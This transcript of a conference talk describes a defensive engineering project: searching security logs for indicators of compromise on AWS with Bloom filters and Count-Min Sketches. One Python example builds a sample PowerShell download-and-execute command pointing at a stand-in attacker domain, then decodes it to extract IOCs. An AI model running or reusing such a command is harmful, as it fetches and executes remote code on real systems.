Thank you very much for the introduction, and thank you all for being here in this session. So I will skip the introduction. Whoops, we are too far ahead in this presentation. Okay, let me get the agenda back on track.

The plan is to talk a little bit about indicators of compromise, which are a core component in cyber security, then describe our legacy infrastructure, move on to a more modern approach, and explain why we should leverage probabilistic data structures to do efficient IOC search.

Before we start, I would like to know: is anyone here familiar with probabilistic data structures? Can you please raise your hand? Okay, that's great. So I hope by the end you get some nice ideas to improve your own systems. Another very simple question: who is working in the cyber security field? Okay, that's the expected result, actually, so let's move on.

We are part of Siemens, more precisely the Cyber Security Defense Center, and our mission is to monitor and also identify threats: we want to protect Siemens from cyber criminals. Since Siemens is such a big company, with more than 500,000 hosts, we have a lot of data. Therefore we run a wide range of technologies. We run a hybrid architecture: part of the systems are on premises, other parts are in the cloud, and we need to run some of them in the cloud in order to scale to this huge amount of data. I will go deeper into that later.

Cyber security nowadays is a huge topic, because cyber criminals are very sophisticated and also well motivated. A typical organization will care about detection vectors such as endpoint security, where it will run antivirus, for example; network security, with firewalls and IDS; and email or proxy solutions from specific vendors, with spam filters or DGA detection. These three detection vectors are quite important, but alone they are not enough to keep the organization protected, so it's paramount to combine all of them. Finally, it's also very important to collect information from these different log sources so that you can do post-mortem analysis, and that's the part I want to introduce you to, which is IOC search.

For the ones who are not familiar with cyber security and may not know this concept, I'm going to give you a brief introduction, and for that I'm going to use a simple analogy. Since we are in Madrid, I decided to bring up this TV show; I'm sure you know this one. Who knows the TV show? Of course, most of you; otherwise you can look it up on Netflix. These guys were very successful in robbing a public organization, actually here in Madrid. Imagine now that you were given the task of protecting another public institution from these same guys. But you don't know if or when they will attack your institution; you really know nothing. You just know what they have done in the past, so you cannot go after them either.
You can only react to their actions. You need to defend your organization, so you need a surveillance system, and you need to decide when to take some action or alert someone in order to escalate an incident, for example to the public authorities. That's basically your mission. To do that, you need to look into what they have done in the past and identify indicators of compromise, which could be someone wearing a red jacket and a mask, a Dalí mask, or carrying ropes and guns. If you see someone with those inside your facilities, or nearby, you can automatically trigger an alert to the authorities so they can react in time. That's basically the goal of indicators of compromise.

In cyber security it's pretty much the same thing: an IOC is evidence that your system or network was already compromised. Simple examples are hash values of files, such as a PDF or a Word document, domain names, and IP addresses; there are more.

Another important fact I want to share with you is that there are thousands of new IOCs per day. They come from different sources, such as public feeds and private intel (organizations nowadays cooperate in order to get more information about different attacks), or from our in-house cyber professionals, who sometimes reverse engineer malware samples. In this simple example there are a lot of suspicious processes, and one of them is actually an encoded payload running in PowerShell. Security professionals can decode that. This one is very simple: they just need to use a Base64 decoder and run some regular expressions. There are more complicated examples, where they need to go through many layers of encoding, but this one is quite simple, and in the end, if you decode it, you get plain text and can extract information such as domains. Why are those domains important? Because you know the malware will connect to those domains, either to exfiltrate your data or to pull other malware or more capabilities. A small sketch of that decoding step follows below.

So what can you do with these indicators? It's quite obvious: you want to pay attention to them, and every time you see them again you want to react. You can think of this as a twofold problem: you need to think about the future and also about the past. If tomorrow I get a new IOC, I want to alert someone, and we run a streaming engine to take care of that. However, in this talk we will focus on the past.
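That decoding step is simple enough to sketch in a few lines of Python. This is a toy illustration, not the speakers' actual tooling: the command, the domain, and the regular expression are made up for the example.

```python
import base64
import re

# Toy example: a command resembling what an encoded PowerShell payload decodes to.
# The domain and command are invented; real payloads come from process logs.
sample_command = "IEX (New-Object Net.WebClient).DownloadString('http://evil-domain.example/payload.ps1')"

# PowerShell's -EncodedCommand flag expects Base64 over UTF-16LE text, so we mimic that here.
encoded_payload = base64.b64encode(sample_command.encode("utf-16-le")).decode("ascii")

# An analyst (or an automated pipeline) reverses the encoding...
decoded = base64.b64decode(encoded_payload).decode("utf-16-le")

# ...and runs a simple regular expression to pull out candidate domains, i.e. the IOCs.
domains = re.findall(r"https?://([A-Za-z0-9.-]+)", decoded)

print(decoded)
print(domains)  # ['evil-domain.example']
```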
Sorry, okay: we will focus on the past, and for that you just need to be able to collect and store your historical data, then run a simple query and try to find out whether the same URL or domain is there.

Now I'm going to describe how we were doing this in the past in terms of infrastructure, why it was a bad idea, and how we evolved our infrastructure. In early 2014 we were running three deployments of a massively parallel database from a specific vendor, and this solution was not ideal because we could only handle a few days of data. If we tried to scale to a couple of months, it was really hard, and it was overwhelming our DevOps team, because they were investing a lot of engineering time just to keep this database alive one more day. On the other side, our stakeholders, the security analysts, were not very happy waiting hours for queries.

So in early 2018 we decided to move into the cloud, and the first step, quite obviously, was to build a data lake. This is super simple. We decided to go with Amazon, and there are really only two technologies you need: S3 for storage and then a computation layer such as Amazon Athena, so that you can query your data. In terms of implementation, deploying this solution is super easy. We no longer have operations; we basically outsource everything to Amazon, because we run these fully managed services, and our queries are much faster. We could also store four times more data. But there is one caveat: the pricing model for this computation scales on demand, so for every terabyte of data you scan, you pay $5. If you do many queries, you can run into a problem, and in IOC search that is actually a problem. If you receive just one IOC, let's say yesterday, and you query your data, say the last 90 days, you get a result; that's fine. But as I said before, you receive thousands of them, and for each one you are querying the same exact data for the same exact time range. This is duplication, and you can already see a pattern here, a point that you could potentially improve. A rough sketch of this per-IOC query pattern appears at the end of this part. Worse than that, you expect your queries to return no results at all, meaning that either (a) your organization is safe, or (b) you are doing a bad job with monitoring. Only a few will return results, and you need to take action on those.

Let's do some quick math to get some intuition about the pricing. For one IOC, 90 days, and a daily average of half a terabyte, you scan about 45 TB, so you pay roughly $200. If you have 100 IOCs it scales linearly, to more or less $22k, and if we do the math for an entire year, with thousands of IOCs per day, that's on the order of $80 million. Okay, for big organizations that's nothing, because cyber security is one of the first things to worry about, and a breach can cause billions in losses, so it's priceless. But still, there is room for improvement, and we decided to move to a third phase, which is to create specialized layers on top of our data lake to answer these very specific and well-defined use cases. We know the pattern; maybe we can improve on naive solutions.

On one end, a naive solution would be to just change the storage system within Amazon, for example to Redshift. But then you are going back to the same problem of coupling storage and computation, so it wouldn't be a good idea, and also bear in mind that we have a petabyte-scale data lake, and a petabyte in a data warehouse is extremely expensive.
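To make the duplication concrete, here is a rough sketch of what that naive per-IOC Athena lookup looks like. The table, columns, database, and result bucket are hypothetical; the talk does not show the real schema.

```python
import boto3

athena = boto3.client("athena")

# Hypothetical table, columns, and partition layout.
QUERY_TEMPLATE = """
SELECT event_time, src_host, domain
FROM proxy_logs
WHERE domain = '{ioc}'
  AND day BETWEEN date_add('day', -90, current_date) AND current_date
"""

def naive_ioc_search(ioc: str) -> str:
    """One Athena query per IOC: every call rescans the same ~90 days of partitions."""
    response = athena.start_query_execution(
        QueryString=QUERY_TEMPLATE.format(ioc=ioc),
        QueryExecutionContext={"Database": "security_data_lake"},
        ResultConfiguration={"OutputLocation": "s3://my-athena-results/"},
    )
    return response["QueryExecutionId"]

# Thousands of IOCs per day means thousands of scans over the exact same data:
# at roughly 0.5 TB/day * 90 days * $5/TB, each lookup costs on the order of $200.
for ioc in ["evil-domain.example", "another-bad-domain.example"]:
    print(naive_ioc_search(ioc))
```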
Another naive option is to move to another cloud provider such as Google; you have probably heard about BigQuery. But those cloud providers are super competitive in terms of pricing, so they do exactly the same as Amazon and charge more or less the same, so there is no really big gap that you can exploit. The final naive option is storing this information in a key-value store, or for example a hash map. But since we have thousands of IOCs per day, it will scale linearly and you will run out of memory or storage for these structures. So a better option, and in my opinion something that suits this use case very well, is using probabilistic data structures. And now I'm going to hand over to my colleague John, who will explain what they are and how you can leverage them.

Hello, can you hear me? So let's talk a little bit about probabilistic data structures. But first, let's walk through some notions of big data. Gartner defines big data with the sentence you see on your screen, and I would like to point out the highlighted words, which define the big data dimensions. But why do these dimensions matter? Okay, sorry, thank you. Why do these big data dimensions matter? Because they present technical challenges to our big data use cases. There are a lot of parallel computing frameworks that address these technical challenges, although as scalability requirements rise, these frameworks struggle to meet the big data demands. So how can we continue improving our knowledge of the data? How can we continue to learn from it? Well, we have to accept a trade-off: we need to lose some data, but continue our learning over time. And this is exactly what probabilistic data structures are to big data: they provide fuzzy views, fuzzy representations, of our data.

Let's walk through these dimensions a little bit. First we have volume. Volume refers to the huge amounts of data we generate every day, and the volume dimension has problems like membership and counting. Membership is just knowing whether an element is in a set, and counting is counting the distinct elements in a set. For membership we have, for instance, Bloom filters, which we will talk about later, and for counting, for counting cardinality, we have HyperLogLog. Variety refers to the different data sources and data types we have in big data. The variety dimension has problems like similarity, where we measure the similarity between two data sets.
We have the SimHash and MinHash algorithms for that. And finally, velocity. Velocity refers to the speed with which we generate, process, and analyze big data. The velocity dimension has problems like frequency and rank. For frequency we can use the Count-Min Sketch; when I say frequency, I mean counting occurrences of elements in a set. And for rank, for instance, we can use Q-Digest: with Q-Digest we can estimate statistical quantiles for our data and then sort it out.

Given this, let's talk about a specific structure, the Count-Min Sketch. With a Count-Min Sketch we can efficiently estimate element frequencies in our set. This structure is compressed compared with other structures, for instance a Python dictionary. It is compressed because it uses hashes to store the values. A Count-Min Sketch is in a way similar to a regular hash table, because they are both two-dimensional arrays, but in the Count-Min Sketch case we store fixed-size integers in our entries. This makes our structure constant in time and space, whilst in hash tables the space complexity is linear: it grows with the elements we insert. So as you can see, the Count-Min Sketch seems a very promising option to estimate our element frequencies.

Let's see how the Count-Min Sketch works. As I said, we have here a two-dimensional array, and the dimensions of this array control the accuracy of our counts. The number of rows is just the number of hash functions we apply to an element to generate hash values that map to the columns of this matrix; so the columns are the range of these hash values. Let's see how this works. We apply our hash functions to our element and generate hash values. These hash values map to entries in our matrix, which we increment in order to insert that element into our structure. Querying the structure works basically the same way: we take our hash values, map them to entries in the matrix, and retrieve the final value as the minimum of those values, hence the name of the structure, Count-Min Sketch.

Now let me present a little bit of code, just to show you how easy it is to interact with a Count-Min Sketch. I am creating an object with a certain width and depth, I am inserting this universe of elements, and then I am checking their counts at the end. Let's see what the Count-Min Sketch gives us, and it gives us the correct answer: we have seen google.com four times and facebook.com two times. A sketch of what such a snippet might look like appears at the end of this part.

But now let me show you a particular behavior of the Count-Min Sketch, specifically with near-zero-frequency elements, so rare elements or never-seen elements. Let's say I insert google.com into our structure, incrementing these entries. Then I insert facebook.com, incrementing these entries, so the final state of the matrix looks something like this. Now I query the structure with somedomain.com, an element that was never seen before. If the hash values of somedomain.com map to these entries, then the Count-Min Sketch will say that somedomain.com was seen before, when in fact it wasn't. This is a behavior we do not want for our use case, because we need low false-positive rates.
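The snippet shown on the slide is not reproduced in the transcript, but the interaction it describes might look roughly like this minimal hand-rolled sketch; the width and depth values here are arbitrary, not the talk's real parameters.

```python
import hashlib


class CountMinSketch:
    """A minimal Count-Min Sketch: a depth x width grid of integer counters."""

    def __init__(self, width: int, depth: int):
        self.width = width
        self.depth = depth
        self.table = [[0] * width for _ in range(depth)]

    def _indexes(self, item: str):
        # Derive `depth` hash values by salting a single hash function with the row number.
        for row in range(self.depth):
            digest = hashlib.sha256(f"{row}:{item}".encode()).hexdigest()
            yield row, int(digest, 16) % self.width

    def add(self, item: str) -> None:
        for row, col in self._indexes(item):
            self.table[row][col] += 1

    def count(self, item: str) -> int:
        # The estimate is the minimum across rows, hence "Count-Min".
        return min(self.table[row][col] for row, col in self._indexes(item))


cms = CountMinSketch(width=2048, depth=5)
for domain in ["google.com"] * 4 + ["facebook.com"] * 2:
    cms.add(domain)

print(cms.count("google.com"))    # 4
print(cms.count("facebook.com"))  # 2
```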
And this brings us to another probabilistic data structure, the Bloom filter. The Bloom filter efficiently estimates membership, so it efficiently estimates whether an element was seen in some set. Whilst the Count-Min Sketch was a two-dimensional structure, the Bloom filter is just a bit array, defined by its length and its number of hash functions. Those parameters control the probability of error in the Bloom filter, and this makes the Bloom filter, like the Count-Min Sketch, constant in space and time, once again compared with a regular hash table. The good thing about Bloom filters is that you can tune the false-positive rate with the number of hash functions; that is the parameter that controls the false-positive rate.

Furthermore, false negatives are impossible. If you insert an element into the structure, you set its bits to one; if you query again for that element, it is impossible for the structure to say that the element has not been seen. That would only be possible if a delete operation were possible, but delete operations are not possible in Bloom filters: in order to delete an element you would need to unset its bits, and that might tamper with the structure, because other elements might map to the same entries and you would be corrupting the Bloom filter. So deletion is not possible in a Bloom filter.

The Bloom filter works roughly the same way as the Count-Min Sketch. You have an element, you pass it through your hash functions, and these map to entries in your array, which you set to one. Querying is the same: you take your hash values, map them to entries, and return a bitwise AND, so you return one if all values are one, and zero otherwise.

Now, here is a similar snippet of code for the Bloom filter, again to show you that it is fairly easy to interact with these structures. I am creating a Bloom filter with a certain capacity and error rate; the capacity and error rate derive the dimensions of the array. I am inserting this universe of elements, which is google.com and facebook.com. You might ask, why am I inserting google.com two times? Well, the Bloom filter insert operation is idempotent. If we insert the same element twice, we get the same outcome, because we are just setting bits: if we insert google.com we set its bits to one, and if we insert it again we set the same bits to one again, so the outcome is the same. At the end I am querying for google.com and facebook.com, which we know we saw, and some random domain that was not in our universe, and the Bloom filter answers correctly according to the universe of elements we saw before. A rough sketch of such a snippet appears at the end of this part.

Now that I've introduced probabilistic data structures a little bit, let's talk about how we leverage them for our use case. In terms of hardware, what did we choose and why? Well, we wanted a cost-effective solution, we wanted to save money. To do this, we committed ourselves to a serverless architecture, and when you talk about serverless architecture and cheap compute services in the cloud, especially in AWS, you talk about AWS Lambda functions. However, Lambda functions have limited storage, so we need to be careful when designing our probabilistic data structure back end. But let's recap the facts of what we have learned so far: Bloom filters can answer with 100% accuracy whether an element was not seen, and can answer with high probability that an element was seen, in this case an IOC. The Count-Min Sketch can estimate how many times that IOC was seen.
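As with the Count-Min Sketch, the Bloom filter snippet on the slide is not in the transcript; a minimal hand-rolled sketch of what it describes might look like this, with arbitrary capacity and error-rate values.

```python
import hashlib
import math


class BloomFilter:
    """Minimal Bloom filter; bit-array length and hash count derived from
    a target capacity and false-positive rate."""

    def __init__(self, capacity: int, error_rate: float):
        # Standard sizing formulas: m = -n*ln(p)/ln(2)^2 bits, k = (m/n)*ln(2) hashes.
        self.num_bits = math.ceil(-capacity * math.log(error_rate) / math.log(2) ** 2)
        self.num_hashes = max(1, round(self.num_bits / capacity * math.log(2)))
        self.bits = bytearray(self.num_bits)

    def _positions(self, item: str):
        # Derive k positions by salting one hash function with the probe index.
        for seed in range(self.num_hashes):
            digest = hashlib.sha256(f"{seed}:{item}".encode()).hexdigest()
            yield int(digest, 16) % self.num_bits

    def add(self, item: str) -> None:
        # Idempotent: adding the same element twice just sets the same bits again.
        for pos in self._positions(item):
            self.bits[pos] = 1

    def __contains__(self, item: str) -> bool:
        # All probed bits set means "probably seen"; any zero means definitely never seen.
        return all(self.bits[pos] for pos in self._positions(item))


bf = BloomFilter(capacity=10_000, error_rate=0.001)
for domain in ["google.com", "google.com", "facebook.com"]:
    bf.add(domain)

print("google.com" in bf)      # True
print("facebook.com" in bf)    # True
print("somedomain.com" in bf)  # False (with very high probability)
```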
So why not just join these two structures and leverage the best of both for our use case? By doing this, we only need to store one structure at a time in the Lambda storage, meaning that we can size our structures in such a way that only one needs to fit at a time in the Lambda storage.

Given this, let's see how this would work. Let's say I am asking how many times some IOC was seen, somewhere, some time ago. Well, let's first ask the Bloom filter, and the Bloom filter will state whether it was seen, with a probability of 99.9 percent. If the Bloom filter answers negative, there is nothing else to do: we just return that we haven't seen this IOC. But if the answer is positive, we just ask the Count-Min Sketch approximately how many times this IOC was seen. With this architecture we only need one structure at a time in our Lambda function. A small end-to-end sketch of this flow follows at the end of this part.

But now, how can we dimension our structures? We have our back end, but we need dimensions for the Bloom filter and the Count-Min Sketch. For that we need to know a little bit about the cardinality of our IOCs, and the only ground truth, let's say, that we have for this is our data lake. So in order to correctly estimate the cardinality of our IOCs, let's use our data and query cardinality values for some representative days. Representative days can be something like days with huge traffic, in order to have a larger upper bound for the cardinality. With these values we compute the average and the standard deviation, and after that we leverage a property of the normal distribution, the 68-95-99.7 rule. You may ask, what the hell is that? Well, it's just a rule that states what percentage of values lies within a band around the mean. What I mean is, for instance, in the image, 68.27% of the values lie between the average minus one standard deviation and the average plus one standard deviation. So let's leverage this for us and estimate our cardinality to be the average plus three times the standard deviation. With this we cover a huge range of possible cardinality values and we do not saturate our probabilistic data structures. If for some reason this value generates probabilistic data structures that do not fit our Lambda storage, we just decrease the factor, and we still cover approximately 95.45 percent. After that, we just perform a benchmark to check the correct dimensions for our desired accuracy.

Now we have our back end and we know how to dimension our structures; next we need to know how to scale them. Our data lake is partitioned by day in order to serve the queries in AWS Athena. Since we are representing our data in a fuzzy way, let's do the same: let's partition the structures by day. By doing this we can parallelize operations and scale limitlessly, because we have a structure for each and every day. The probabilistic data structures do not saturate, because each day is a new probabilistic data structure, and if for some reason they might saturate, we can always estimate the cardinality and the dimensions again and adapt, and from that day on the structures will have dimensions adapted to the new IOC cardinality.

Now, given the theory and what we use about probabilistic data structures, let's present an architecture diagram.
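Before the architecture diagram, here is a minimal sketch of that two-step lookup and the per-day partitioning, reusing the BloomFilter and CountMinSketch classes sketched earlier. In production each day's structures would live on S3 and be pulled into the Lambda container one at a time; an in-memory dict stands in for that storage here, so the names and parameters are illustrative only.

```python
# Stand-in for per-day serialized structures stored on S3.
daily_structures: dict = {}

def ingest_day(day: str, domains: list) -> None:
    """Build that day's pair of structures from the ingested traffic."""
    bloom = BloomFilter(capacity=10_000, error_rate=0.001)
    cms = CountMinSketch(width=2048, depth=5)
    for domain in domains:
        bloom.add(domain)
        cms.add(domain)
    daily_structures[day] = (bloom, cms)

def how_many_times_seen(ioc: str, day: str) -> int:
    bloom, cms = daily_structures[day]
    if ioc not in bloom:       # "never seen" is answered with 100% certainty
        return 0
    return cms.count(ioc)      # otherwise an approximate count (may slightly overestimate)

ingest_day("2019-11-18", ["evil-domain.example"] * 3 + ["google.com"] * 40)
print(how_many_times_seen("evil-domain.example", "2019-11-18"))    # 3
print(how_many_times_seen("unseen-domain.example", "2019-11-18"))  # 0
```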
So we have two phases in our architecture: a query phase and an update phase. It works like this: the client calls the API, which was built using API Gateway, and API Gateway calls an entry point on a Lambda function that triggers the logic to query the probabilistic data structures. All the logic of asking first the Bloom filter and then the Count-Min Sketch is within our orchestration service, which is AWS Step Functions; that is the service that coordinates the application logic in order to serve the query. If for some reason consulting the probabilistic structures fails, then we just fail over to Athena, as before, for the reliability of our application. In the update phase, since we have a fuzzy view of the data, we need to stay synchronized with it, at least in time. So as we ingest data, we synchronize our probabilistic data structures with that ingestion, again using an orchestration service with the logic to update the probabilistic structures.

So, after this presentation of what we designed and implemented, let's see what outcome we had. These are metrics regarding our service: the data scanned, the cost, and the requests, over three months of the new implementation, with a migration period and a go-live period. As you can see, as we deployed this new implementation, our costs and data scans started to decrease; more precisely, they each decreased 24 times. Furthermore, in order to achieve this cost reduction, we did not need to limit our service requests: we did this without any service downgrade.

Now, to finish the timeline we saw before: we designed a specialized solution for this use case, which is IOC search using probabilistic data structures. This resulted in lightning fast queries, so we query petabytes of data in less than a minute, and in terms of overall costs we reduced our costs per year by nearly 75%. So overall we are very happy with the outcome of this implementation.

To finish, let me show you what we took away from this journey. Probabilistic data structures fit a wide range of big data use cases, because they tackle the technical challenges that big data poses. In order to use probabilistic data structures to answer more complex questions, you can assemble probabilistic data structures and target your demands in terms of use cases; that's what we did in ours. And finally, probabilistic data structures are space and memory efficient. The big lesson we took from this is that if you engineer your applications smartly, you can save a lot of money in the big data and cloud realm. Thank you very much. If you have any questions, we are here for you.

Yeah, thank you for the talk, it was very interesting. Can you tell us how you store the probabilistic data structures in Amazon? In which data store, like DynamoDB or SQL or something like this?

No, we store them in the Lambda storage, in the Lambda itself. To be more precise, they are on S3, and then you pull them into the Lambda container when you want to query them, because you also need to update them, so they need to be available for both cases. Oh, that makes sense, thank you. And just some values in terms of storage: these representations, as my colleague was saying, these fuzzy representations, are around 200 megabytes each, which is enough to represent a huge cardinality for a specific day or month.
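The storage pattern described in that answer, structures serialized to S3 and pulled into the Lambda container on demand, might be sketched roughly like this; the bucket name, key layout, and pickle serialization are assumptions for illustration, not the team's actual implementation.

```python
import pickle

import boto3

s3 = boto3.client("s3")

# Hypothetical bucket and key layout. Each serialized structure (~200 MB, per the Q&A)
# is pulled into the Lambda container's /tmp storage only when it is needed.
def load_structure(kind: str, day: str):
    local_path = f"/tmp/{kind}-{day}.bin"
    s3.download_file("ioc-probabilistic-structures", f"{kind}/{day}.bin", local_path)
    with open(local_path, "rb") as fh:
        return pickle.load(fh)

bloom = load_structure("bloom", "2019-11-18")
```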
So, if I may, a final question: anyone with good ideas to implement in your organizations or pet projects, whatever, can you please raise your hand? Okay, I see some hands. Cool. Thank you very much, everyone. Bye. Thank you.